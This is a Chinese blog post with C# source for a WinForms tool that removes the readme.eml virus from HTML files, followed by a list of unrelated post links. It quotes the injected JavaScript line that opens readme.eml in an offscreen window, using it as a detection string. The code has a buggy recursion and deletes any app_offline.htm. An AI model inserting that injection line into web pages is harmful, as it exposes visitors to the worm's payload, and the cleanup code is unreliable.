HTML中readme.eml专杀
来源:互联网 发布:php商城制作教程 编辑:程序博客网 时间:2024/05/04 03:03
中了readme.eml病毒,所有html的末尾被加了三句js:<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>,写个程序自动删除js,并删除readme.eml和app_offline.htm文件....
总结:拼接字符串时双引号要用/"来转义,多线程传参,递归调用,streamreader,filestream,replace函数等的使用
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Threading;
namespace virus_clear
{
public partial class Form1 : Form
{
string drive;
public Form1()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
drive = this.comboBox1.Text;
Thread thread = new Thread(new ParameterizedThreadStart(getFolders));
thread.Start((Object)drive);
//getFolders(drive);
}
private void Form1_Load(object sender, EventArgs e)
{
this.comboBox1.Items.AddRange( Directory.GetLogicalDrives());
this.comboBox1.SelectedIndex = 0; //默认路径为选择的第一个内容
}
private void comboBox1_SelectedIndexChanged(object sender, EventArgs e)
{
drive = comboBox1.Text; //修改路径
//MessageBox.Show(drive);
}
void getFolders(Object path)
{
string path1 = (String)path;
clearVirus(path1); //清除盘符下的病毒
string []folders = Directory.GetDirectories(path1);
foreach (string folder in folders)
{
//MessageBox.Show(folder);
clearVirus(path1);
path1 = folder;
getFolders(path1); //自身递归调用,遍历文件夹下所有目录
}
}
void clearVirus(string path)
{
try
{
string[] files = Directory.GetFiles(path, "*.*");
foreach (string file in files)
{
FileInfo f = new FileInfo(file);
this.toolStripStatusLabel1.Text ="正在检测文件:"+f.FullName;
if (f.Name.ToLower() == "readme.eml")
f.Delete();
if (f.Extension == ".html" || f.Extension == ".htm")
{
if (f.Name.ToLower() == "app_offline.htm")
f.Delete();
else
{
StreamReader sr = new StreamReader(f.FullName, Encoding.Default);
string content = sr.ReadToEnd();
sr.Close(); //关闭sr
string s = "<html><script language=/"JavaScript/">window.open(/"readme.eml/", null,/"resizable=no,top=6000,left=6000/")</script></html>";
if (content.IndexOf(s) != -1) //如果包含s那段代码就删掉
{
string newcontent = content.Replace(s, ""); //删掉s那段代码
byte[] newcontentbyte = Encoding.Default.GetBytes(newcontent); //用默认编码将内容放入缓冲区
this.toolStripStatusLabel1.Text = "正在清除文件:" + f.Name + "中的病毒";
FileStream fs = new FileStream(f.FullName, FileMode.Create, FileAccess.Write); //重新写入文件(修改后的代码)file.create覆盖已经存在的
fs.Write(newcontentbyte, 0, newcontentbyte.Length);
fs.Flush(); //写入,清空缓冲区
fs.Close(); //关闭文件流
}
else
{
//MessageBox.Show("NO VIRUS");
}
}
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
private void button2_Click(object sender, EventArgs e)
{
FolderBrowserDialog f = new FolderBrowserDialog();
f.ShowDialog();
//f.ShowNewFolderButton = true; //显示新建文件夹选项
this.comboBox1.Text = f.SelectedPath;
drive = this.comboBox1.Text; //重新设置扫描路径
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
Environment.Exit(Environment.ExitCode); //彻底退出,防止线程没有结束
}
}
}
- HTML中readme.eml专杀
- 提取邮件(eml格式)保存为html-python
- README
- Readme
- README
- README
- readme
- readme
- readme
- ReadMe
- ReadMe
- README
- README
- readme
- Readme
- README
- README
- README
- Value Your Time
- 如何取得瀏覽器視窗高度及寬度 (跨瀏覽器)
- jvm 内存分配的方法和支持的最大内存
- NLS Investigator
- 转:Scrum的中国式MMO生存
- HTML中readme.eml专杀
- xshell连接linux中文乱码
- overlapped IO 网摘
- [转载]ptlib 中MergeSym
- 完成端口(一个小例子,供学习用!)
- javascript的笔试题目(共17道)附参考答案
- 阅读源代码---交叉索引工具
- English Improvement Plan
- weblogic10 标签库配置